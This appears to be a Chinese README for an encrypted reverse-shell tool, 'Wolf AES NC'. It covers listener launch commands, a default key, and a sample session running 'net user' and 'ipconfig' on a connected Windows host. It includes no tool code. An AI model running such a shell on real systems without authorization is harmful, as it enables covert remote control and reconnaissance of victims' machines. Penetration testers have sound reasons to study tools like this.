Wolf NC AES Shell 1.0
Wolf AES NC - 加密反弹Shell文档
Wolf AES NC 是一个基于AES加密的反弹Shell工具,采用WolfHash通信密钥认证机制,支持自定义端口和密码。
功能特性
- AES-256加密通信:所有数据传输均使用AES加密
- WolfHash密钥认证:基于WolfHash的双向身份验证
- 灵活配置:支持自定义监听端口和通信密钥
- 持久监听:服务端支持多客户端连接,自动清理断开连接
- 命令交互:实时执行远程命令并返回结果
使用方法
基础启动
wolfnc.exe
- 监听端口:7556(默认)
- 通信密钥:ca63457538b9b1e0(默认)
自定义端口
wolfnc.exe 8888
- 监听端口:8888
- 通信密钥:ca63457538b9b1e0(默认)
自定义端口与密钥
wolfnc.exe 8888 ca63457538b9b342
- 监听端口:8888
- 通信密钥:ca63457538b9b342
工作流程
| 阶段 | 描述 |
|---|---|
| 服务端初始化 | 在指定端口(默认7556)启动监听 |
| 客户端连接 | 客户端连接后,显示连接信息(IP:端口) |
| 命令交互 | 在CMD >提示符后输入命令,实时执行并返回结果 |
| 会话终止 | 输入exit或客户端断开连接后,进行清理操作 |
| 恢复监听 | 自动返回监听状态,等待下一个客户端连接 |
连接示例
>wolfnc.exe 8888 ca63457538b9b342
WolfShell AES NC 1.0
Listening on port: 8888
Client connected: 192.168.50.31:65181
CMD > net user
\\WIN7 的用户帐户
[返回用户列表结果]
CMD > ipconfig
[返回网络配置结果]
CMD > exit
Connection closed.
Listening on port: 8888
密钥管理
安全建议:
- 定期更换通信密钥,避免使用默认密钥
- 在生产环境中使用强随机密钥
- 密钥仅在授权用户之间传递
故障排除
| 问题 | 原因 | 解决方案 |
|---|---|---|
| 端口被占用 | 指定端口已被其他进程使用 | 更换端口:wolfnc.exe [新端口] |
| 连接失败 | 密钥不匹配 | 确认客户端和服务端密钥一致 |
| 命令无响应 | 网络连接中断 | 检查网络连接,重新连接 |
免责声明
- 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
- 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。